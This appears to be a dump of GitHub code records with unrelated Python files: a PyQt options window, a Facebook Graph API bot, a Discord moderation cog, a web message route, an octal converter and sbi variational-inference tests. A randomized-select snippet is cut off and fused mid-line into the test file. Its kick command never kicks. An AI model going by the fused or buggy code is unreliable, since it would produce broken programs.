= QVBoxLayout()\n        self.bottom_layout = QGridLayout()\n        self.middle_layout = QGridLayout()\n        self.top_layout = QHBoxLayout()\n\n        self.layout.addLayout(self.top_layout)\n        self.layout.addLayout(self.middle_layout)\n        self.layout.addLayout(self.bottom_layout)\n\n        self.Options_widget = QWidget()\n        self.Options_widget.setLayout(self.layout)\n\n        self.PrimaryMathsTitle = QLabel(\"Primary Maths Game (Options)\")\n        self.PrimaryMathsTitle.setAlignment(Qt.AlignCenter)\n\n        PrimaryMathsTitleFont = QFont()\n        PrimaryMathsTitleFont.setPointSize(15)\n        PrimaryMathsTitleFont.setBold(True)\n        self.PrimaryMathsTitle.setFont(PrimaryMathsTitleFont)\n\n        #self.OptionsTitle = QLabel(\"Options\")\n        #self.OptionsTitle.setAlignment(Qt.AlignCenter|Qt.AlignBottom)\n\n        #self.OptionsTitle.setFont(PrimaryMathsTitleFont)\n\n        self.top_layout.addWidget(self.PrimaryMathsTitle)\n        #self.top_layout.addWidget(self.OptionsTitle)\n        self.middle_layout.addWidget(self.change_difficulty_button,0,1)\n        self.middle_layout.addWidget(self.change_record_button,1,1)\n        self.middle_layout.addWidget(self.clear_data_button,2,1)\n\n        self.setCentralWidget(self.Options_widget)\n        self.Options_widget.setMinimumSize(QSize(450,300))\n","repo_name":"Riltro/Implementation","sub_path":"GUIs/Testing_stacked.py","file_name":"Testing_stacked.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"3903382517","text":"import os\nimport facebook\nfrom logs import (write_log, STATUS_FILE,\n                  print_write_chatbot, input_user_chat)\nfrom utils.utils import get_credentials\n\n\ndef show_albums(facebook_api: facebook.GraphAPI, albums_id: list) -> None:\n    \"\"\"\n    Prints a list of the albums of the user\n\n    Arguments:\n        facebook_api (facebook.GraphAPI)\n        albums_id (list): Contains the albums of the user\n    \"\"\"\n    albums = facebook_api.get_connections(id = 'me', connection_name = 'albums')\n    info_list = albums['data']\n    print_write_chatbot(\"Your albums are: \")\n    for count, info in enumerate(info_list, 1):\n        print(count, info[\"name\"])\n        albums_id.append(info[\"id\"])\n\n\n
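# A small helper sketch (hypothetical, not in the original source) showing how\n# `show_albums` above and `validate_number` below are combined by the callers in\n# this module:\ndef _choose_album_id(facebook_api: facebook.GraphAPI) -> str:\n    \"\"\"Show the user's albums and return the id of the one they pick.\"\"\"\n    albums_id = []\n    show_albums(facebook_api, albums_id)\n    choice = int(input_user_chat(\"Select the album: \")) - 1\n    choice = validate_number(choice, albums_id)\n    return albums_id[choice]\n\n\n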
def validate_number(number: int, list_: list) -> int:\n    \"\"\"\n    Validates the index entered by the user\n\n    Arguments:\n        number (int): Number of the list selected\n        list_ (list): Contains the list of the user\n\n    Returns:\n        int - The value of the input given by the user\n    \"\"\"\n    while number not in range(len(list_)):\n        number = int(input_user_chat(\"re-select: \"))\n    return number\n\n\ndef upload_to_albums(facebook_api: facebook.GraphAPI) -> None:\n    \"\"\"\n    Uploads a picture from the user to the album the user must select\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n    \"\"\"\n    path = input_user_chat(\"Please enter the path of your picture: \")\n    if path:\n        albums_id = []\n        show_albums(facebook_api, albums_id)\n        select = int(input_user_chat(\"Select the album: \")) - 1\n        select = validate_number(select, albums_id)\n        caption = input_user_chat(\"Caption: \")\n        try:\n            # `select` is already zero-based here; the original indexed\n            # `albums_id[select - 1]`, which skipped one album.\n            facebook_api.put_photo(image = open(path, 'rb'), album_path = albums_id[select] + \"/photos\",\n                                   message = caption)\n            print_write_chatbot(\"The photo has been uploaded successfully!\", color = \"green\",\n                                attrs_color = [\"bold\"])\n        except Exception as error:\n            write_log(STATUS_FILE, f\"There was a problem opening the file, error: {error}\", \"Exception\")\n            print_write_chatbot(f\"There was a problem opening the file, error: {error}\", color = \"red\",\n                                attrs_color = [\"bold\"])\n\n\ndef search_file() -> str:\n    \"\"\"\n    A file is searched and validated based on an absolute path\n\n    Returns:\n        str - Absolute path of the file\n    \"\"\"\n    found_file = False\n    path = ''\n    while not found_file:\n        path = os.path.abspath(input_user_chat(\"Enter the file path, the file must be .jpg: \"))\n        if os.path.exists(path):\n            found_file = True\n        else:\n            print_write_chatbot(f\"The path doesn't exist, please enter a correct path \\n\", color = \"red\",\n                                attrs_color = [\"bold\"])\n    return path\n\n\ndef upload_photo(facebook_api: facebook.GraphAPI) -> None:\n    \"\"\"\n    Asks the user for the path of the photo and the caption\n    the user wants to upload, and uploads both\n\n    Arguments:\n        facebook_api (object) : the facebook graph api\n    \"\"\"\n    path = search_file()\n    caption = input_user_chat(\"Caption: \")\n    try:\n        facebook_api.put_photo(image = open(path, 'rb'), message = caption)\n        print_write_chatbot(\"The photo has been uploaded successfully!\", color = 'green', attrs_color = [\"bold\"])\n    except Exception as error:\n        write_log(STATUS_FILE, f\"There was a problem uploading the file, error: {error}\", 'Exception')\n        print_write_chatbot(f\"There was a problem uploading the file, error: {error}\", color = \"red\",\n                            attrs_color = [\"bold\"])\n\n\ndef upload_post(facebook_api: facebook.GraphAPI) -> None:\n    \"\"\"\n    Uploads the post written by the user and prints the success of the action if there are no errors\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n    \"\"\"\n    user_message = input_user_chat(\"What would you like to write?: \")\n    try:\n        facebook_api.put_object(parent_object = 'me', connection_name = 'feed', message = user_message)\n        print_write_chatbot(\"Posting has been updated successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n    except Exception as err:\n        write_log(STATUS_FILE, str(err), 'Exception')\n        print_write_chatbot(f\"Error uploading a post: {err}\", color = \"red\", attrs_color = ['bold'])\n\n\ndef follower_count(facebook_api: facebook.GraphAPI) -> None:\n    \"\"\"\n    Prints the count of followers of the page\n\n    
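Example (illustrative only, not from the original source):\n        follower_count(facebook_api)   # prints e.g. \"Number of followers: 123\"\n\n    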
Arguments:\n        facebook_api (object) : facebook api graph\n    \"\"\"\n    followers = facebook_api.get_object(id = 'me', fields = 'followers_count')\n    print_write_chatbot(f\"Number of followers: {str(followers['followers_count'])}\\n\")\n\n\ndef like(facebook_api: facebook.GraphAPI, selection: int) -> None:\n    \"\"\"\n    Likes the selection and prints the success of the action\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n        selection (int) : The number of the post the user selected\n    \"\"\"\n    facebook_api.put_like(object_id = selection)\n    print_write_chatbot(\"The post has been liked successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef comment(facebook_api: facebook.GraphAPI, selection: int) -> None:\n    \"\"\"\n    Asks what the user would like to comment, posts the response as a comment\n    and prints the success of the action\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n        selection (int) : The number of the post the user selected\n    \"\"\"\n    text = input_user_chat(\"What would you like to comment: \").capitalize()\n    facebook_api.put_comment(object_id = selection, message = text)\n    print_write_chatbot(\"It has been successfully commented!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef delete_post(facebook_api: facebook.GraphAPI, selection: str) -> None:\n    \"\"\"\n    Deletes the selected post\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n        selection (str) : The id of the post the user selected\n    \"\"\"\n    facebook_api.delete_object(id = selection)\n    print_write_chatbot(\"The post has been successfully removed!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef edit_post(facebook_api: facebook.GraphAPI, selection: int, message: str) -> None:\n    \"\"\"\n    Edits the selection and prints the success of the action\n\n    Arguments:\n        facebook_api (object) : facebook api graph\n        selection (int) : The number of the post the user selected\n        message (str) : New message of the post\n    \"\"\"\n    facebook_api.put_object(parent_object = selection, connection_name = '', message = message)\n    print_write_chatbot(\"Posting has been updated successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef if_text_in_info(info: dict, posts_id: list, count: int):\n    \"\"\"\n    Prints the number, the created time and the content of the post,\n    and appends its id to the posts_id list\n\n    Arguments:\n        info (dict) : Data of the posts in the graph\n        posts_id (list) : List of the posts of the page\n        count (int) : The number of the post\n    \"\"\"\n    if \"message\" in info:\n        text_description = f\": {info['message']}\"\n    elif \"story\" in info:\n        text_description = f\": {info['story']}\"\n    else:\n        text_description = ''\n\n    print_write_chatbot(f\"{count}, {info['created_time'][0:10]} {text_description}\")\n    posts_id.append(info[\"id\"])\n\n\ndef get_posts(facebook_api: facebook.GraphAPI, type_post: str) -> dict:\n    \"\"\"\n    Returns own posts or visitor posts based on type_post\n\n    Arguments:\n        facebook_api (facebook.GraphAPI) : object facebook API\n        type_post (str) : indicator of the type of posts (e.g. published_posts, visitor_posts)\n\n    Returns:\n        dict\n    \"\"\"\n    return facebook_api.get_connections(id = 'me', connection_name = type_post)\n\n\ndef post_related(facebook_api: facebook.GraphAPI, action: str, selected: str) -> None:\n    \"\"\"\n    The posts of the page are shown and depending on the action, it will be 
edited / liked/ deleted / commented\n \n Arguments:\n facebook_api (object) : facebook api graph\n action (str) : The action the user wants to do\n selected (str) : The connection name the user selected\n \n \"\"\"\n posts_id = []\n selection = 0\n posts = get_posts(facebook_api, selected)\n info_list = posts['data']\n print_write_chatbot(\"The posts are: \")\n for count, info in enumerate(info_list, start = 1):\n if_text_in_info(info, posts_id, count)\n \n if action != \"read\":\n option = int(input_user_chat(\"Select one: \")) - 1\n option = validate_number(option, posts_id)\n selection = posts_id[option]\n \n try:\n if action == \"like\":\n like(facebook_api, selection)\n elif action == \"comment\":\n comment(facebook_api, selection)\n elif action == \"delete\":\n delete_post(facebook_api, selection)\n elif action == \"edit\":\n text = input_user_chat(\"Enter the new caption: \").capitalize()\n edit_post(facebook_api, selection, message = text)\n \n except Exception as error:\n write_log(STATUS_FILE, str(error), 'Exception')\n print_write_chatbot(f\"Error {error}\", color = \"red\", attrs_color = [\"bold\"])\n\n\n# ------------ CONNECTION ---------------#\n\n\ndef connection_api(user_credentials: dict = {}) -> object:\n \"\"\"\n If the user does not enter their credentials, those of crux are used.\n Returns the facebook Api and checks if there was any error while connecting to Facebook\n \n Arguments:\n user_credentials (str): users token\n \n Returns:\n object - (facebook_api)\n \"\"\"\n facebook_api = ''\n if not user_credentials:\n credentials = get_credentials()\n page_token = credentials['facebook']['token']\n else:\n page_token = user_credentials[\"token\"]\n \n try:\n facebook_api = facebook.GraphAPI(access_token = page_token, version = \"2.12\")\n except Exception as err:\n write_log(STATUS_FILE, str(err), 'Exception')\n print(\"Error\")\n else:\n write_log(STATUS_FILE, 'Successfully connected with Facebook the api', 'GraphAPI')\n print_write_chatbot('You have successfully connected with the Facebook api!\\n', color = 'green',\n attrs_color = [\"bold\"])\n \n return facebook_api\n","repo_name":"FrancoSecchi/instagram-facebook-bot","sub_path":"apis/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":10673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9682909449","text":"import discord \r\nfrom discord.ext import commands\r\nimport os\r\nfrom dotenv import load_dotenv\r\nimport random\r\nimport json\r\nimport asyncio\r\nfrom PIL import Image,ImageFont,ImageDraw\r\nfrom io import BytesIO\r\nimport datetime\r\nimport DiscordUtils\r\nimport praw\r\n\r\nclass Moderations(commands.Cog):\r\n \r\n def __init__(self,bot):\r\n self.bot = bot\r\n @commands.Cog.listener() \r\n async def on_ready(self):\r\n print('moderation command loaded')\r\n \r\n @commands.command()\r\n @commands.has_permissions(administrator = True)\r\n async def changeprefix(self,ctx, prefix):\r\n\r\n with open(\"prefixes.json\", \"r\") as f:\r\n prefixes = json.load(f)\r\n\r\n prefixes[str(ctx.guild.id)] = prefix\r\n\r\n with open(\"prefixes.json\", \"w\") as f:\r\n json.dump(prefixes,f) \r\n\r\n await ctx.send(f\"The prefix was changed to {prefix}\")\r\n await ctx.guild.me.edit(nick=f'[{prefix}] Noahbot')\r\n\r\n @commands.command()\r\n @commands.has_permissions(manage_channels =True)\r\n async def purge(self,ctx,amount = 5):\r\n await ctx.channel.purge(limit = amount)\r\n \r\n @commands.command()\r\n async def mute(self,ctx, 
member: discord.Member,time: int,d,*,reason = None):\r\n guild = ctx.guild\r\n if discord.utils.get(ctx.guild.roles,name = \"Muted\"):\r\n await ctx.send(\"Mute role already exists!\")\r\n var = discord.utils.get(ctx.guild.roles,name = \"Muted\")\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=False, send_messages=False)\r\n await member.add_roles(var)\r\n embed = discord.Embed(title=\"muted!\", description=f\"{member.mention} has been muted \", colour=discord.Colour.light_gray())\r\n embed.add_field(name=\"reason:\", value=reason, inline=False)\r\n embed.add_field(name=\"time left for the mute:\", value=f\"{time}{d}\", inline=False)\r\n await ctx.send(embed=embed)\r\n if d == \"s\":\r\n await asyncio.sleep(time)\r\n\r\n if d == \"m\":\r\n await asyncio.sleep(time*60)\r\n\r\n if d == \"h\":\r\n await asyncio.sleep(time*60*60)\r\n\r\n if d == \"d\":\r\n await asyncio.sleep(time*60*60*24)\r\n\r\n await member.remove_roles(var)\r\n embed = discord.Embed(title=\"unmute (temp) \", description=f\"unmuted -{member.mention} \", colour=discord.Colour.light_gray())\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n await guild.create_role(name = \"Muted\",color = discord.Color(0x0062ff))\r\n var = discord.utils.get(ctx.guild.roles,name = \"Muted\")\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=False, send_messages=False)\r\n await ctx.send(\"Muted role created!\")\r\n await member.add_roles(var)\r\n embed = discord.Embed(title=\"muted!\", description=f\"{member.mention} has been tempmuted \", colour=discord.Colour.light_gray())\r\n embed.add_field(name=\"reason:\", value=reason, inline=False)\r\n embed.add_field(name=\"time left for the mute:\", value=f\"{time}{d}\", inline=False)\r\n await ctx.send(embed=embed)\r\n if d == \"s\":\r\n await asyncio.sleep(time)\r\n\r\n if d == \"m\":\r\n await asyncio.sleep(time*60)\r\n\r\n if d == \"h\":\r\n await asyncio.sleep(time*60*60)\r\n\r\n if d == \"d\":\r\n await asyncio.sleep(time*60*60*24)\r\n\r\n await member.remove_roles(var)\r\n embed = discord.Embed(title=\"unmute (temp) \", description=f\"unmuted -{member.mention} \", colour=discord.Colour.light_gray())\r\n await ctx.send(embed=embed)\r\n\r\n \r\n\r\n @commands.command()\r\n async def deletechannel(self,ctx,channel:discord.TextChannel):\r\n embed = discord.Embed(\r\n title = \"Success\",\r\n description = f\"Channel:{channel} has been deleted\"\r\n )\r\n if ctx.author.guild_permissions.manage_channels == True:\r\n await ctx.send(embed = embed)\r\n await channel.delete()\r\n else:\r\n await ctx.send(\"you cannot delete a channel get perms noob!\")\r\n \r\n @commands.command()\r\n async def createchannel(self,ctx , channel):\r\n guild = ctx.guild\r\n embed = discord.Embed(\r\n title = \"Success\",\r\n description = f\"Channel:{channel} has been created\"\r\n )\r\n if ctx.author.guild_permissions.manage_channels == True:\r\n await guild.create_text_channel(name ='{}'.format(channel))\r\n await ctx.send(embed=embed)\r\n else:\r\n await ctx.send(\"you cannot create a channel get perms noob!\")\r\n \r\n @commands.command(name=\"ban\")\r\n async def ban(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.administrator:\r\n try:\r\n if member.guild_permissions.administrator:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"User has Admin permissions.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n 
title=\"User Banned!\",\r\n description=f\"**{member}** was banned by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n await member.send(f\"You were banned by **{context.message.author}**!\\nReason: {reason}\")\r\n await member.ban(reason=reason)\r\n except:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"An error occurred while trying to ban the user.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members = True)\r\n async def unban(self,ctx, * , member):\r\n banned_users = await ctx.guild.bans()\r\n member_name,member_disc = member.split(\"#\")\r\n for banned_entry in banned_users:\r\n user = banned_entry.user\r\n if(user.name,user.discriminator) == (member_name,member_disc):\r\n await ctx.guild.unban(user)\r\n await ctx.send(member_name + \" has been unbanned XD!\")\r\n return\r\n await ctx.send(member+ \" was not found! **disappeared??**\")\r\n \r\n @commands.command(name='kick', pass_context=True)\r\n async def kick(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.kick_members:\r\n if member.guild_permissions.administrator:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"User has Admin permissions.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n try:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"User Kicked!\",\r\n description=f\"**{member}** was kicked by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n try:\r\n await member.send(\r\n f\"You were kicked by **{context.message.author}**!\\nReason: {reason}\"\r\n )\r\n except:\r\n pass\r\n except:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"An error occurred while trying to kick the user.\",\r\n color=0x00FF00\r\n )\r\n await context.message.channel.send(embed=embed)\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n \r\n @commands.command(name=\"warn\")\r\n async def warn(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.administrator:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"User Warned!\",\r\n description=f\"**{member}** was warned by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n try:\r\n await member.send(f\"You were warned by **{context.message.author}**!\\nReason: {reason}\")\r\n except:\r\n pass\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n @commands.command(name=\"poll\")\r\n async def poll(self, context, *args):\r\n poll_title = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"A new poll has been created!\",\r\n description=f\"{poll_title}\",\r\n color=0x00FF00\r\n )\r\n embed.set_footer(\r\n 
text=f\"Poll created by: {context.message.author} Рђб React to vote!\"\r\n )\r\n embed_message = await context.send(embed=embed)\r\n await embed_message.add_reaction(\"­ЪЉЇ\")\r\n await embed_message.add_reaction(\"­ЪЉј\")\r\n await embed_message.add_reaction(\"­Ъци\")\r\n \r\n @commands.has_permissions(manage_channels = True)\r\n @commands.command(name = \"createvoice\")\r\n async def createvoice(self,ctx,name,*,bitrate:int = None,user_limit:int = None):\r\n if bitrate == None:\r\n await ctx.send(\"Please give bitrate (recommended : 64)\")\r\n if user_limit == None:\r\n await ctx.send(\"Please give user limit\")\r\n else:\r\n return\r\n else:\r\n await ctx.guild.create_voice_channel(name = name,bitrate = bitrate*1000,user_limit=user_limit)\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command(name = \"editserver\")\r\n async def editserver(self,ctx,name:str=None,description:str = None,icon:bytes =None,banner:bytes=None,owner=discord.Member):\r\n try:\r\n await ctx.guild.edit(name = name,description = description,icon = icon,banner=banner,owner=owner)\r\n except discord.Forbidden:\r\n await ctx.send(\"you dont have permissions to do that noob!\")\r\n except discord.HTTPException:\r\n await ctx.send(\"failed editing the server\")\r\n except discord.InvalidArgument:\r\n await ctx.send(\"something went wrong!\")\r\n\r\n\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command(name = \"makerole\")\r\n async def createrole(self,ctx,name,color):\r\n dictOfColors = { 'default' : discord.Color.default(),\r\n 'teal' : discord.Color.teal(),\r\n 'darkteal' : discord.Color.dark_teal(),\r\n 'green' : discord.Color.green(),\r\n 'darkgreen' : discord.Color.dark_green(),\r\n 'blue' : discord.Color.blue(),\r\n 'purple' : discord.Color.purple(),\r\n 'darkpurple' : discord.Color.dark_purple(),\r\n 'magenta' : discord.Color.magenta(),\r\n 'darkmagenta' : discord.Color.dark_magenta(),\r\n 'gold' : discord.Color.gold(),\r\n 'darkgold' : discord.Color.dark_gold(),\r\n 'orange' : discord.Color.orange(),\r\n 'darkorange' : discord.Color.dark_orange(),\r\n 'red' : discord.Color.red(),\r\n 'darkred' : discord.Color.dark_red() }\r\n guild = ctx.guild\r\n await guild.create_role(name = name,color = dictOfColors[color])\r\n await ctx.send(f\"Role `{name}` has been created!\")\r\n\r\n\r\n\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command()\r\n async def giverole(self,ctx, member: discord.Member,name: str,color):\r\n dictOfColors = { 'default' : discord.Color.default(),\r\n 'teal' : discord.Color.teal(),\r\n 'darkteal' : discord.Color.dark_teal(),\r\n 'green' : discord.Color.green(),\r\n 'darkgreen' : discord.Color.dark_green(),\r\n 'blue' : discord.Color.blue(),\r\n 'purple' : discord.Color.purple(),\r\n 'darkpurple' : discord.Color.dark_purple(),\r\n 'magenta' : discord.Color.magenta(),\r\n 'darkmagenta' : discord.Color.dark_magenta(),\r\n 'gold' : discord.Color.gold(),\r\n 'darkgold' : discord.Color.dark_gold(),\r\n 'orange' : discord.Color.orange(),\r\n 'darkorange' : discord.Color.dark_orange(),\r\n 'red' : discord.Color.red(),\r\n 'darkred' : discord.Color.dark_red() }\r\n guild = ctx.guild\r\n if discord.utils.get(ctx.guild.roles,name = name):\r\n await ctx.send(f\"`{name}` role already exists!\")\r\n var = discord.utils.get(ctx.guild.roles,name = name)\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=True, send_messages=True)\r\n await member.add_roles(var)\r\n await ctx.send(f\"{name} role given to 
{member.mention}\")\r\n else:\r\n await guild.create_role(name = name,color = dictOfColors[color])\r\n var = discord.utils.get(ctx.guild.roles,name = name)\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=True, send_messages=True)\r\n await ctx.send(f\"`{name}` role created!\")\r\n await member.add_roles(var)\r\n await ctx.send(f\"{name} role given to {member.mention}\")\r\n \r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Moderations(bot))","repo_name":"The-DarK-os/theNoah","sub_path":"Cogs/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":15205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5495714570","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: 'Zhang'\n\"\"\"\nfrom model.Message import Message\nfrom routes.routes_index import http_response\nfrom utils import log, template\n\n\ndef messages_index(request):\n\tlog('本次请求的 method', request.method)\n\tdata = request.query\n\tif len(data) > 0:\n\t\tMessage.new(data)\n\t# 处理msg便于输出\n\tbody = template('message.html', messages=Message.all())\n\treturn http_response(body)\n\n\ndef messages_add(request):\n\tlog('本次请求的 method', request.method)\n\tdata = request.form()\n\tif len(data) > 0:\n\t\tMessage.new(data)\n\tbody = template('message.html', messages=Message.all())\n\treturn http_response(body)\n","repo_name":"AlvinZhn/web_framwork","sub_path":"routes/routes_message.py","file_name":"routes_message.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22611985636","text":"from Decimal import *\nfrom Binary import *\n\nclass Octal():\n\n def isOctal(self, oct):\n aux=list(str(oct))\n for digit in aux:\n if (int(digit) < 0) or (int(digit) > 7):\n return False\n return True\n\n def toDecimal(self, oct):\n aux=list(str(oct)[::-1])\n num=0\n for i,digit in enumerate(aux):\n num+=int(digit)*pow(8, i)\n return num\n\n def toBinary(self, oct):\n aux=list(str(oct))\n n=Decimal()\n bin=\"\"\n for digit in aux:\n aux1=n.toBinary(int(digit))\n mod=len(aux1)%3\n if mod > 0:\n for i in range(3-(mod)):\n aux1=\"0\"+aux1\n bin+=aux1\n for i in range(3):\n if bin[0] == \"0\":\n bin=bin[1::]\n return bin\n\n def toHexadecimal(self, oct):\n return Binary().toHexadecimal(self.toBinary(oct))","repo_name":"OscarGutierrez312/ConversorSistemasNumericos","sub_path":"Octal.py","file_name":"Octal.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543793503","text":"import numpy as np\n\n\ndef randomized_select(A,p,r,i):\n if p==r:\n return A[p]\n q=randomized_partition(A,p,r)\n\n k=q-p+1\n if i==k:\n return A[q]\n elif i bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform)\n posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n posterior.vi_method = vi_method\n posterior.train()\n samples = posterior.sample((num_samples,), method=sampling_method)\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"num_dim\", (1, 2))\n@pytest.mark.parametrize(\"q\", (\"maf\", \"nsf\", \"gaussian_diag\", \"gaussian\", 
\"mcf\", \"scf\"))\ndef test_c2st_vi_flows_on_Gaussian(num_dim: int, q: str):\n \"\"\"Test VI on Gaussian, comparing to ground truth target via c2st.\n\n Args:\n num_dim: parameter dimension of the gaussian model\n vi_method: different vi methods\n sampling_method: Different sampling methods\n\n \"\"\"\n # Coupling flows undefined at 1d\n if num_dim == 1 and q in [\"mcf\", \"scf\"]:\n return\n\n num_samples = 2000\n\n likelihood_shift = -1.0 * ones(num_dim)\n likelihood_cov = 0.3 * eye(num_dim)\n prior_mean = zeros(num_dim)\n prior_cov = eye(num_dim)\n\n x_o = zeros((1, num_dim))\n target_distribution = true_posterior_linear_gaussian_mvn_prior(\n x_o[0], likelihood_shift, likelihood_cov, prior_mean, prior_cov\n )\n target_samples = target_distribution.sample((num_samples,))\n\n class TractablePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return target_distribution.log_prob(\n torch.as_tensor(theta, dtype=torch.float32)\n )\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform, q=q)\n posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n posterior.train(n_particles=1000, eps=1e-8)\n samples = posterior.sample((num_samples,))\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"num_dim\", (1, 2))\ndef test_c2st_vi_external_distributions_on_Gaussian(num_dim: int):\n \"\"\"Test VI on Gaussian, comparing to ground truth target via c2st.\n\n Args:\n num_dim: parameter dimension of the gaussian model\n vi_method: different vi methods\n sampling_method: Different sampling methods\n\n \"\"\"\n num_samples = 2000\n\n likelihood_shift = -1.0 * ones(num_dim)\n likelihood_cov = 0.3 * eye(num_dim)\n prior_mean = zeros(num_dim)\n prior_cov = eye(num_dim)\n\n x_o = zeros((1, num_dim))\n target_distribution = true_posterior_linear_gaussian_mvn_prior(\n x_o[0], likelihood_shift, likelihood_cov, prior_mean, prior_cov\n )\n target_samples = target_distribution.sample((num_samples,))\n\n class TractablePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return target_distribution.log_prob(\n torch.as_tensor(theta, dtype=torch.float32)\n )\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n mu = zeros(num_dim, requires_grad=True)\n scale = ones(num_dim, requires_grad=True)\n q = torch.distributions.Independent(torch.distributions.Normal(mu, scale), 1)\n posterior = VIPosterior(\n potential_fn,\n prior,\n theta_transform=theta_transform,\n q=q,\n vi_method=\"rKL\",\n parameters=[mu, scale],\n )\n posterior.set_default_x(x_o)\n posterior.train(check_for_convergence=False)\n samples = posterior.sample((num_samples,))\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.parametrize(\"q\", (\"maf\", \"nsf\", \"gaussian_diag\", \"gaussian\", \"mcf\", \"scf\"))\ndef test_deepcopy_support(q: str):\n \"\"\"Tests if the variational does support deepcopy.\n\n Args:\n q: Different variational posteriors.\n \"\"\"\n\n num_dim = 2\n\n class FakePotential(BasePotential):\n def __call__(self, theta, 
